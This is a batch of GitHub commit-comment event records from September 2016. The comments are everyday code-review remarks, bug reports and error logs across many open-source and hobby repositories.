{"id":"4507119472","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18876569,"position":null,"line":null,"path":null,"commit_id":"2498c4435de1b250b1b7087ca7e375b7c36e43ff","created_at":"2016-09-02T07:58:15Z","updated_at":"2016-09-02T07:58:15Z","body":"Need whitespace after `private`. I.e. `private [` not `private[`. \r\n"}},"created_at":"2016-09-02T07:58:15Z"}
{"id":"4507122167","type":"CommitCommentEvent","actor":{"login":"hosomi"},"repo":{"name":"hosomi/develop-spring-template"},"payload":{"comment":{"id":18876573,"position":5,"line":90,"path":"build.gradle","commit_id":"ebfeaee8dfbe82ec47e407adf742886e66c6807e","created_at":"2016-09-02T07:58:56Z","updated_at":"2016-09-02T07:58:56Z","body":"これをいれても wercker には適用されず成果物が文字バケる。。"}},"created_at":"2016-09-02T07:58:56Z"}
{"id":"4507122255","type":"CommitCommentEvent","actor":{"login":"hanoihu"},"repo":{"name":"hanoihu/Hello-World"},"payload":{"comment":{"id":18876574,"position":1,"line":1,"path":"README.md","commit_id":"64c3f4f06d515e585cf3683b68f5d87953ce54b3","created_at":"2016-09-02T07:58:57Z","updated_at":"2016-09-02T07:58:57Z","body":"System.out.println(\"fu\")"}},"created_at":"2016-09-02T07:58:57Z"}
{"id":"4507122738","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876576,"position":154,"line":154,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:59:05Z","updated_at":"2016-09-02T07:59:05Z","body":"Be aware that this may take a long, long time, as there may be thousands of disks. I don't have any solution."}},"created_at":"2016-09-02T07:59:05Z"}
{"id":"4507123318","type":"CommitCommentEvent","actor":{"login":"SoapGentoo"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18876580,"position":53,"line":53,"path":"dev-libs/beignet/beignet-1.1.2.ebuild","commit_id":"cd119cad371b2ddd61a50479eacf83e9f7f6efce","created_at":"2016-09-02T07:59:15Z","updated_at":"2016-09-02T07:59:15Z","body":"Rather use `if tc-is-gcc; then`"}},"created_at":"2016-09-02T07:59:15Z"}
{"id":"4507123476","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876582,"position":87,"line":87,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:59:17Z","updated_at":"2016-09-02T07:59:17Z","body":"Well, honestly I don't know. It's question on users. I can remove this option and add it in case users will want it."}},"created_at":"2016-09-02T07:59:17Z"}
{"id":"4507126560","type":"CommitCommentEvent","actor":{"login":"SoapGentoo"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18876588,"position":89,"line":89,"path":"dev-libs/beignet/beignet-1.1.2.ebuild","commit_id":"cd119cad371b2ddd61a50479eacf83e9f7f6efce","created_at":"2016-09-02T08:00:07Z","updated_at":"2016-09-02T08:00:07Z","body":"You're doing I/O, so needs `|| die`"}},"created_at":"2016-09-02T08:00:07Z"}
{"id":"4507127265","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876589,"position":139,"line":139,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T08:00:18Z","updated_at":"2016-09-02T08:00:18Z","body":"OK."}},"created_at":"2016-09-02T08:00:18Z"}
{"id":"4507127949","type":"CommitCommentEvent","actor":{"login":"mmun"},"repo":{"name":"bterlson/ecmarkup"},"payload":{"comment":{"id":18876590,"position":33,"line":53,"path":"package.json","commit_id":"f47d6587f3768d253abbdad88a990d86244a4952","created_at":"2016-09-02T08:00:25Z","updated_at":"2016-09-02T08:00:25Z","body":"FYI, Moving jsdom to devDeps broke our build: https://travis-ci.org/handlebars-lang/spec/builds/157025277\r\n\r\nSeems like it's used by `utils`?"}},"created_at":"2016-09-02T08:00:25Z"}
{"id":"4507128219","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18876592,"position":null,"line":null,"path":null,"commit_id":"7e7f07a41d5460ccba3cd1ee0be5cba43eb5fc17","created_at":"2016-09-02T08:00:28Z","updated_at":"2016-09-02T08:00:28Z","body":"Yeah, same here... Plus the right seems a bit crowded with this there as well?"}},"created_at":"2016-09-02T08:00:28Z"}
{"id":"4507133394","type":"CommitCommentEvent","actor":{"login":"smalyshev"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18876601,"position":null,"line":null,"path":null,"commit_id":"e576714f6b4829763b797c552217a14e6d30ca59","created_at":"2016-09-02T08:01:39Z","updated_at":"2016-09-02T08:01:39Z","body":"Unfortunately looks like the version we have in the source does not have enclen_end. Probably needs more comprehensive upgrade then. "}},"created_at":"2016-09-02T08:01:39Z"}
{"id":"4507136149","type":"CommitCommentEvent","actor":{"login":"EnkhturB"},"repo":{"name":"EnkhturB/Github"},"payload":{"comment":{"id":18876609,"position":14,"line":13,"path":".gitignore","commit_id":"44d4e72e3a18bb6ef9a02f75dbad97568377e02b","created_at":"2016-09-02T08:02:22Z","updated_at":"2016-09-02T08:02:22Z","body":"return aaa"}},"created_at":"2016-09-02T08:02:22Z"}
{"id":"4507137185","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"mapserver/mapserver"},"payload":{"comment":{"id":18876613,"position":null,"line":null,"path":null,"commit_id":"b007fdb06871dc95e5b2577c0bd83d16b31459bd","created_at":"2016-09-02T08:02:37Z","updated_at":"2016-09-02T08:02:37Z","body":"ok, I think I've found the issue (a GDAL one actually). Can you open a dedicated MapServer ticket about that ? I should be able to workaround the GDAL bug (that I'm fixing anyway)"}},"created_at":"2016-09-02T08:02:37Z"}
{"id":"4507137277","type":"CommitCommentEvent","actor":{"login":"anthonydillon"},"repo":{"name":"ubuntudesign/cloud-init.io"},"payload":{"comment":{"id":18876614,"position":null,"line":null,"path":null,"commit_id":"91d25a48b72fb0453bd22f1ed650c004308a8b8e","created_at":"2016-09-02T08:02:39Z","updated_at":"2016-09-02T08:02:39Z","body":"# Done\r\n- Updated the employer of Josh Harlow's\r\n\r\n## QA\r\n- Check the copy has been update correctly\r\n\r\n### Details\r\n- Fixes: #46"}},"created_at":"2016-09-02T08:02:39Z"}
{"id":"4507137602","type":"CommitCommentEvent","actor":{"login":"EnkhturB"},"repo":{"name":"EnkhturB/Github"},"payload":{"comment":{"id":18876615,"position":13,"line":12,"path":".gitignore","commit_id":"44d4e72e3a18bb6ef9a02f75dbad97568377e02b","created_at":"2016-09-02T08:02:43Z","updated_at":"2016-09-02T08:02:43Z","body":"stop"}},"created_at":"2016-09-02T08:02:43Z"}
{"id":"4507137846","type":"CommitCommentEvent","actor":{"login":"cmfcmf"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":18876616,"position":null,"line":null,"path":null,"commit_id":"2a8e59859248b49eea78abb5a21cca393e12ab94","created_at":"2016-09-02T08:02:47Z","updated_at":"2016-09-02T08:02:47Z","body":"This won't work if the Core is installed from the CLI, as there is no session. I don't agree with this change."}},"created_at":"2016-09-02T08:02:47Z"}
{"id":"4507140403","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18876620,"position":8,"line":8,"path":"issue11/regist.php","commit_id":"ba80619dcf97541977b73c1d09c1b37c7b69e642","created_at":"2016-09-02T08:03:28Z","updated_at":"2016-09-02T08:03:28Z","body":"理想をいうとPHPの処理の部分(HTMLの埋め込み以外の部分)は一番上に書いたほうがよいですね~。\r\nそうすると無駄なエラーが減ります(まだないので実感はないかもしれません)。\r\n\r\nPHPの処理の部分とはこのコードでいうとここから"}},"created_at":"2016-09-02T08:03:28Z"}
{"id":"4507140915","type":"CommitCommentEvent","actor":{"login":"SferaDev"},"repo":{"name":"AOSPA/manifest"},"payload":{"comment":{"id":18876621,"position":null,"line":null,"path":null,"commit_id":"b019e50a5354f64b1b178354825cf173b4d36ee8","created_at":"2016-09-02T08:03:34Z","updated_at":"2016-09-02T08:03:34Z","body":"I did based on how the manifest work on Fuchsia, we thought that keeping a clean default.xml manifest was a good idea. I think other ROMs are doing a similar approach on nougat too."}},"created_at":"2016-09-02T08:03:34Z"}
{"id":"4507141113","type":"CommitCommentEvent","actor":{"login":"codexss"},"repo":{"name":"codexss/shadowsocks-manager"},"payload":{"comment":{"id":18876622,"position":null,"line":null,"path":null,"commit_id":"54aed724f5576de360c35ca5ccbf1040b72c6df0","created_at":"2016-09-02T08:03:37Z","updated_at":"2016-09-02T08:03:37Z","body":"你用nodejs手动执行一下这个指令试试，记得把变量换成时间戳数值\r\n\r\nglasswm <notifications@github.com>于2016年9月2日周五 15:41写道：\r\n\r\n> 测试了下，按这个修改后，续费码仍然加不上时间。\r\n> @codexss <https://github.com/codexss> 你改后测试成功吗？\r\n>\r\n> —\r\n> You are receiving this because you were mentioned.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/codexss/shadowsocks-manager/commit/54aed724f5576de360c35ca5ccbf1040b72c6df0#commitcomment-18876371>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AFruITINa2Bo1ri0WTu_SPMu9h7CmQUrks5ql9MjgaJpZM4Jzcq1>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-02T08:03:37Z"}
{"id":"4507141724","type":"CommitCommentEvent","actor":{"login":"kokuma03"},"repo":{"name":"kokuma0302/kokuma030201"},"payload":{"comment":{"id":18876626,"position":1,"line":1,"path":".gitignore","commit_id":"35c275c4eba850d4e39f56937f395fef20a76bad","created_at":"2016-09-02T08:03:44Z","updated_at":"2016-09-02T08:03:44Z","body":"woooo"}},"created_at":"2016-09-02T08:03:44Z"}
{"id":"4507142424","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18876627,"position":28,"line":28,"path":"issue11/regist.php","commit_id":"ba80619dcf97541977b73c1d09c1b37c7b69e642","created_at":"2016-09-02T08:03:53Z","updated_at":"2016-09-02T08:03:53Z","body":"ここまでになります。"}},"created_at":"2016-09-02T08:03:53Z"}
{"id":"4507146518","type":"CommitCommentEvent","actor":{"login":"torkiljohnsen"},"repo":{"name":"vinkla/laravel-translator"},"payload":{"comment":{"id":18876635,"position":null,"line":null,"path":null,"commit_id":"7c077968d7516196aadbc46c9f1c034794105849","created_at":"2016-09-02T08:04:56Z","updated_at":"2016-09-02T08:04:56Z","body":"See #66"}},"created_at":"2016-09-02T08:04:56Z"}
{"id":"4507150001","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18876639,"position":99,"line":99,"path":"lib/ansible/module_utils/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T08:05:50Z","updated_at":"2016-09-02T08:05:50Z","body":"Not sure about this. Won't it change the global logging settings? What if other parts of Ansible, or other modules, are using logging as well?"}},"created_at":"2016-09-02T08:05:50Z"}
{"id":"4507150381","type":"CommitCommentEvent","actor":{"login":"kokuma03"},"repo":{"name":"kokuma0302/kokuma030201"},"payload":{"comment":{"id":18876641,"position":null,"line":null,"path":null,"commit_id":"35c275c4eba850d4e39f56937f395fef20a76bad","created_at":"2016-09-02T08:05:56Z","updated_at":"2016-09-02T08:05:56Z","body":"hello!"}},"created_at":"2016-09-02T08:05:56Z"}
{"id":"4507153069","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18876650,"position":9,"line":21,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-02T08:06:37Z","updated_at":"2016-09-02T08:06:37Z","body":"I am not sure whether we actually still need `digit.lab`. At least it does not behave the way we expect, right?"}},"created_at":"2016-09-02T08:06:37Z"}
{"id":"4507154028","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18876655,"position":17,"line":0,"path":"framework/src/play/src/main/scala/play/api/data/validation/Validation.scala","commit_id":"4413dfebd55a5202634fbceb87d07ff3353f2a17","created_at":"2016-09-02T08:06:52Z","updated_at":"2016-09-02T08:06:52Z","body":"Not a valid Scaladoc description. Better to share with the other one (using `@define`)"}},"created_at":"2016-09-02T08:06:52Z"}
{"id":"4507154136","type":"CommitCommentEvent","actor":{"login":"smalyshev"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18876656,"position":null,"line":null,"path":null,"commit_id":"e576714f6b4829763b797c552217a14e6d30ca59","created_at":"2016-09-02T08:06:54Z","updated_at":"2016-09-02T08:06:54Z","body":"Looks like https://github.com/kkos/oniguruma/commit/dc0badb71714e64004ef66cb7bfba71675e27097 is the most recent version. "}},"created_at":"2016-09-02T08:06:54Z"}
{"id":"4507155589","type":"CommitCommentEvent","actor":{"login":"michael-o"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18876660,"position":6,"line":292,"path":"lib/curl_sasl.c","commit_id":"a78c61a4bf5b7eb90b0945d94568b7b3b1f23c6e","created_at":"2016-09-02T08:07:17Z","updated_at":"2016-09-02T08:07:17Z","body":"Any comment on this?"}},"created_at":"2016-09-02T08:07:17Z"}
{"id":"4507157600","type":"CommitCommentEvent","actor":{"login":"ericek111"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18876665,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-02T08:07:49Z","updated_at":"2016-09-02T08:07:49Z","body":"HOLY MOLY! Wow! That's reaaally nice! Is everything (those fancy titles’n’stuff) hardcoded or is it being computed on-the-fly? "}},"created_at":"2016-09-02T08:07:49Z"}
{"id":"4507160443","type":"CommitCommentEvent","actor":{"login":"kokuma03"},"repo":{"name":"kokuma0301/kokuma030101"},"payload":{"comment":{"id":18876666,"position":null,"line":null,"path":null,"commit_id":"7bd6ffa99de70f48bc49cb5ef6b608373c221b9a","created_at":"2016-09-02T08:08:29Z","updated_at":"2016-09-02T08:08:29Z","body":"super World"}},"created_at":"2016-09-02T08:08:29Z"}
{"id":"4507166460","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18876678,"position":17,"line":42,"path":"resources/materials/ultimaker_pla_silver-metallic.xml.fdm_material","commit_id":"cb1a36577c8ab6686bb1f83ced2f0e61a09bf3e2","created_at":"2016-09-02T08:10:06Z","updated_at":"2016-09-02T08:10:06Z","body":"Err no. Those are debug changes. Should not have happend. I'll put them back. "}},"created_at":"2016-09-02T08:10:06Z"}
{"id":"4507171201","type":"CommitCommentEvent","actor":{"login":"ramakrishnaippili"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":18876687,"position":null,"line":null,"path":null,"commit_id":"33a3799539eae3ab5a1427426f891c3625841b9b","created_at":"2016-09-02T08:11:19Z","updated_at":"2016-09-02T08:11:19Z","body":"import static resources, already we are doing for other static resources used here."}},"created_at":"2016-09-02T08:11:19Z"}
{"id":"4507171543","type":"CommitCommentEvent","actor":{"login":"DevJ0049"},"repo":{"name":"emcmanus/atari-ai"},"payload":{"comment":{"id":18876688,"position":null,"line":null,"path":null,"commit_id":"8e628cc9aec0fdd59dd8fe1af8f8dfa6e5ef6f64","created_at":"2016-09-02T08:11:24Z","updated_at":"2016-09-02T08:11:24Z","body":"Wow its great"}},"created_at":"2016-09-02T08:11:24Z"}
{"id":"4507172578","type":"CommitCommentEvent","actor":{"login":"McSwaggens"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18876692,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-02T08:11:40Z","updated_at":"2016-09-02T08:11:40Z","body":"The title is inside of a file called `./csgo`,\r\nyou can print it out manually with `cat csgo`.\r\n\r\nThe source code has been pushed to my branch.\r\nI still have to do the toggles, I have some nice ideas for how it will look."}},"created_at":"2016-09-02T08:11:40Z"}
{"id":"4507172679","type":"CommitCommentEvent","actor":{"login":"rom1v"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18876693,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-02T08:11:42Z","updated_at":"2016-09-02T08:11:42Z","body":"Question au passage:\r\n\r\n```cpp\r\nfloat v1 = 2.5; // float de valeur 2.5 (à partir du double 2.5)\r\nfloat v2 = 2.5f; // float de valeur 2.5\r\nfloat v3 = 0x2.8; // float de valeur 2.5 (à partir du double 2.5)\r\nfloat v4 = 0x2.8f // float de valeur 2.5 (0x2.8) ou 2.55859375 (0x2.8F)?\r\n```\r\n\r\nJe pense que `v4` vaut `2.55859375` (j'ai pas de compilateur c++17 sous la main). Mais du coup, il n'est pas possible d'écrire un float en hexa directement, il faut caster:\r\n\r\n```cpp\r\nvoid f(double v) { … }\r\nvoid f(float v) { … }\r\nint main() {\r\n    f(static_cast<float>(0x2.8));\r\n}\r\n```"}},"created_at":"2016-09-02T08:11:42Z"}
{"id":"4507172825","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18876694,"position":99,"line":99,"path":"lib/ansible/module_utils/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T08:11:45Z","updated_at":"2016-09-02T08:11:45Z","body":"Right. I should remove it. I've added it here mainly for myself for debugging."}},"created_at":"2016-09-02T08:11:45Z"}
{"id":"4507173333","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":18876695,"position":4,"line":642,"path":"openerp/addons/base/ir/ir_ui_view.py","commit_id":"71384533c40867c627d64fd1be462234258525d4","created_at":"2016-09-02T08:11:53Z","updated_at":"2016-09-02T08:11:53Z","body":"_apply_group"}},"created_at":"2016-09-02T08:11:53Z"}
{"id":"4507174994","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18876696,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-02T08:12:17Z","updated_at":"2016-09-02T08:12:17Z","body":"@vigiljose you tested it with the lastest version here (ffmpegt 3.1.3)? Because ffmpeg had in 3.1.2 iirc some transcoding/colour issues - never saw this."}},"created_at":"2016-09-02T08:12:17Z"}
{"id":"4507175183","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18876697,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-02T08:12:20Z","updated_at":"2016-09-02T08:12:20Z","body":"@SubJunk Well, my interpretation is - once you transcode from lossless to lossy, information is lost. This lost information can't be retrieved or recreated by increasing the bitrate. So increasing bitrate is redundant.\r\n\r\nPlus, for UMS, there is no further transcoding. The transcoded output is written to a pipe and discarded later. \r\n\r\n"}},"created_at":"2016-09-02T08:12:20Z"}
{"id":"4507180796","type":"CommitCommentEvent","actor":{"login":"737297447"},"repo":{"name":"737297447/qingshu"},"payload":{"comment":{"id":18876702,"position":11,"line":11,"path":"README.md","commit_id":"63f018113a72c5d560fa6fc0101ca685b02dcc16","created_at":"2016-09-02T08:13:47Z","updated_at":"2016-09-02T08:13:47Z","body":"apk上传到了百度市场，看效果的可以直接下载\r\nhttp://shouji.baidu.com/software/7774199.html"}},"created_at":"2016-09-02T08:13:47Z"}
{"id":"4507183549","type":"CommitCommentEvent","actor":{"login":"737297447"},"repo":{"name":"737297447/qingshu"},"payload":{"comment":{"id":18876709,"position":11,"line":11,"path":"README.md","commit_id":"63f018113a72c5d560fa6fc0101ca685b02dcc16","created_at":"2016-09-02T08:14:29Z","updated_at":"2016-09-02T08:14:29Z","body":"![Uploading dd096b63f6246b6011a543e8eef81a4c500fa287.png…]()\r\n![Uploading 6f338744ebf81a4c70d51d55d22a6059242da643.png…]()\r\n![Uploading e444ebf81a4c510ffb2313866559252dd52aa543.png…]()\r\n![Uploading 794c510fd9f9d72a44cfe181d12a2834359bbb87.png…]()\r\n"}},"created_at":"2016-09-02T08:14:29Z"}
{"id":"4507186549","type":"CommitCommentEvent","actor":{"login":"SarthakNarang"},"repo":{"name":"SarthakNarang/android_kernel_onyx"},"payload":{"comment":{"id":18876717,"position":null,"line":null,"path":null,"commit_id":"30dd8d9a625ffaa9dc8ce0a42463518d9420dbe3","created_at":"2016-09-02T08:15:15Z","updated_at":"2016-09-02T08:15:15Z","body":"Lol, ik and i hv pushed the changes in another branch. Will update asap. PS : exams going on so stfu"}},"created_at":"2016-09-02T08:15:15Z"}
{"id":"4507188255","type":"CommitCommentEvent","actor":{"login":"stuartc"},"repo":{"name":"OpenFn/language-commcare"},"payload":{"comment":{"id":18876719,"position":14,"line":102,"path":"src/Adaptor.js","commit_id":"54c9cbe158df7fdb30bae9d76cba892f80ccf435","created_at":"2016-09-02T08:15:40Z","updated_at":"2016-09-02T08:15:40Z","body":"@taylordowns2000 since the report data is a single item we don't need to reduce over them in order to post them them OpenFn."}},"created_at":"2016-09-02T08:15:40Z"}
{"id":"4507197176","type":"CommitCommentEvent","actor":{"login":"stuartc"},"repo":{"name":"OpenFn/language-commcare"},"payload":{"comment":{"id":18876736,"position":15,"line":103,"path":"src/Adaptor.js","commit_id":"54c9cbe158df7fdb30bae9d76cba892f80ccf435","created_at":"2016-09-02T08:17:59Z","updated_at":"2016-09-02T08:17:59Z","body":"@taylordowns2000 since `post` returns a promise, we can just call it immediately and `.then` like before.\r\n\r\nThe only reason the `reduce` was there was to start with a promise and keep chaining each `post` operation onto it, in order to post the submissions synchronously (one at a time).\r\n\r\nSince we don't need to do that here we can remove it."}},"created_at":"2016-09-02T08:17:59Z"}
{"id":"4507201578","type":"CommitCommentEvent","actor":{"login":"kaiping"},"repo":{"name":"kaiping/keras"},"payload":{"comment":{"id":18876745,"position":null,"line":null,"path":null,"commit_id":"ee16765bb9fe0c4ae39afca6227e295c400e1470","created_at":"2016-09-02T08:19:03Z","updated_at":"2016-09-02T08:19:03Z","body":"This 2 running scripts correspond to time unit of [DAY]"}},"created_at":"2016-09-02T08:19:03Z"}
{"id":"4507211787","type":"CommitCommentEvent","actor":{"login":"lazzich"},"repo":{"name":"getgrav/grav-plugin-admin"},"payload":{"comment":{"id":18876763,"position":null,"line":null,"path":null,"commit_id":"18c3b3e39f167107e3d1b2c5d459a5cec922af46","created_at":"2016-09-02T08:21:25Z","updated_at":"2016-09-02T08:21:25Z","body":"../classes/admin.php updated and all looks fine now. Thanks a lot!"}},"created_at":"2016-09-02T08:21:25Z"}
{"id":"4507215234","type":"CommitCommentEvent","actor":{"login":"zhmeda523"},"repo":{"name":"zhmeda523/first_file"},"payload":{"comment":{"id":18876768,"position":1,"line":1,"path":"cici","commit_id":"62a6e4248e19de4ccd4f416f90676ef2546ef5e1","created_at":"2016-09-02T08:22:15Z","updated_at":"2016-09-02T08:22:15Z","body":"qqq"}},"created_at":"2016-09-02T08:22:15Z"}
{"id":"4507216168","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18876772,"position":null,"line":null,"path":null,"commit_id":"2498c4435de1b250b1b7087ca7e375b7c36e43ff","created_at":"2016-09-02T08:22:28Z","updated_at":"2016-09-02T08:22:28Z","body":"@DardoTheMaster, the following was output to the client/local RPT log file when storing the first vehicle in the garage as a civilian: \r\n\r\n```\r\n18:17:43 Error in expression <};\r\n_count = counts select _sel;\r\nswitch (_side) do {\r\ncase east : { _vehiclesLimit>\r\n18:17:43   Error position: <_side) do {\r\ncase east : { _vehiclesLimit>\r\n18:17:43   Error Undefined variable in expression: _side\r\n18:17:43 File mpmissions\\__CUR_MP.Altis\\core\\actions\\fn_storeVehicle.sqf, line 40\r\n18:17:43 Error in expression <sLimit && _vehiclesLimit != 0)\r\n};\r\n\r\nif (!_room) exitWith {hint localize \"STR_NOTF>\r\n18:17:43   Error position: <_room) exitWith {hint localize \"STR_NOTF>\r\n18:17:43   Error Undefined variable in expression: _room\r\n18:17:43 File mpmissions\\__CUR_MP.Altis\\core\\actions\\fn_storeVehicle.sqf, line 49\r\n```\r\n\r\nconfig/Config_Master.hpp: \r\n\r\n```cpp\r\n    garage_limit_COP = 5; //Allows false and numerical values.\r\n    garage_limit_OPFOR = 4; //Allows false and numerical values.\r\n    garage_limit_MEDIC = 3; //Allows false and numerical values.\r\n    garage_limit_CIVILIAN = 2; //Allows false and numerical values.\r\n```\r\n\r\nWhen trying to retrieve the vehicle a hint says \"Spawning vehicle please wait...\", but no vehicle spawns and it stays in the garage. \r\n"}},"created_at":"2016-09-02T08:22:28Z"}
{"id":"4507216579","type":"CommitCommentEvent","actor":{"login":"zhmeda523"},"repo":{"name":"zhmeda523/first_file"},"payload":{"comment":{"id":18876776,"position":1,"line":1,"path":"cici","commit_id":"62a6e4248e19de4ccd4f416f90676ef2546ef5e1","created_at":"2016-09-02T08:22:33Z","updated_at":"2016-09-02T08:22:33Z","body":"qqqq"}},"created_at":"2016-09-02T08:22:33Z"}
{"id":"4507218334","type":"CommitCommentEvent","actor":{"login":"Kuzmenenkova"},"repo":{"name":"kasiveyser/aaa"},"payload":{"comment":{"id":18876778,"position":null,"line":null,"path":null,"commit_id":"238e45489a101b3e9cd743a507f9af395489f206","created_at":"2016-09-02T08:23:01Z","updated_at":"2016-09-02T08:23:01Z","body":"видимо это в другом файле, не здесь"}},"created_at":"2016-09-02T08:23:01Z"}
{"id":"4507219495","type":"CommitCommentEvent","actor":{"login":"romaintailhurat"},"repo":{"name":"UNECE/Classification-Explorer"},"payload":{"comment":{"id":18876782,"position":null,"line":null,"path":null,"commit_id":"52b9eca7523727db80e10d1a2c1a0f9ae9bbc6ef","created_at":"2016-09-02T08:23:17Z","updated_at":"2016-09-02T08:23:17Z","body":"Nice !"}},"created_at":"2016-09-02T08:23:17Z"}
{"id":"4507225753","type":"CommitCommentEvent","actor":{"login":"elizachen"},"repo":{"name":"elizachen/elizachen.github.io"},"payload":{"comment":{"id":18876793,"position":null,"line":null,"path":null,"commit_id":"f3fd102b1b7a1c15a7dbb5602453afb59a2e330c","created_at":"2016-09-02T08:24:48Z","updated_at":"2016-09-02T08:24:48Z","body":"Finally remember to use following command to change the user.name & email . :p\r\n$ git config --global user.name xxx\r\n$ git config --global user.email xxxx"}},"created_at":"2016-09-02T08:24:48Z"}
{"id":"4507228200","type":"CommitCommentEvent","actor":{"login":"akudet"},"repo":{"name":"akudet/chinasofti"},"payload":{"comment":{"id":18876798,"position":8,"line":38,"path":"java1607/web/FirstWeb/src/jtwu/controller/service/CookiesService.java","commit_id":"d12d18012dae17036f8a08649e6ed7aff145b03e","created_at":"2016-09-02T08:25:24Z","updated_at":"2016-09-02T08:25:24Z","body":"here should call setValue() too. in case user may issue get a requestDispatcher to send things back.\r\nbut I can't see it's a good idea to set it as null, for two reasons.\r\n1st user need to call addCookiesToResponse() to add cookies back.\r\n2nd it require (here is the jsp page to handle null value) which I think is not good.\r\n\r\nit's really a good practice."}},"created_at":"2016-09-02T08:25:24Z"}
{"id":"4507233464","type":"CommitCommentEvent","actor":{"login":"nimasmi"},"repo":{"name":"torchbox/wagtail-torchbox"},"payload":{"comment":{"id":18876811,"position":141,"line":74,"path":"tbx/core/templates/torchbox/about_page.html","commit_id":"af1f668475482ec857869626a4588e7070367b38","created_at":"2016-09-02T08:26:38Z","updated_at":"2016-09-02T08:26:38Z","body":"_I_ said that."}},"created_at":"2016-09-02T08:26:38Z"}
{"id":"4507236637","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18876825,"position":null,"line":null,"path":null,"commit_id":"2498c4435de1b250b1b7087ca7e375b7c36e43ff","created_at":"2016-09-02T08:27:24Z","updated_at":"2016-09-02T08:27:24Z","body":"The following was output to the client/local RPT log file when trying to impound a vehicle:\r\n\r\n```\r\n18:26:16 Error in expression <on 0.01;\r\n_cP = 0.01;\r\n_cfgType = switch (side _owner) do { case east:{\"garage_lim>\r\n18:26:16   Error position: <side _owner) do { case east:{\"garage_lim>\r\n18:26:16   Error side: Type String, expected Object,Group,Location\r\n18:26:16 File mpmissions\\__CUR_MP.Altis\\core\\actions\\fn_impoundAction.sqf, line 33\r\n```\r\n\r\nThe progress bar gets stuck at 1%. \r\n"}},"created_at":"2016-09-02T08:27:24Z"}
{"id":"4507238398","type":"CommitCommentEvent","actor":{"login":"MrZaYaC"},"repo":{"name":"nikiforovserge/Hillel-FE-Basic"},"payload":{"comment":{"id":18876832,"position":23,"line":22,"path":"index.html","commit_id":"010b9542008998520642fa2532b059ea02efd99f","created_at":"2016-09-02T08:27:48Z","updated_at":"2016-09-02T08:27:48Z","body":"забыл закрыть тег `img`"}},"created_at":"2016-09-02T08:27:48Z"}
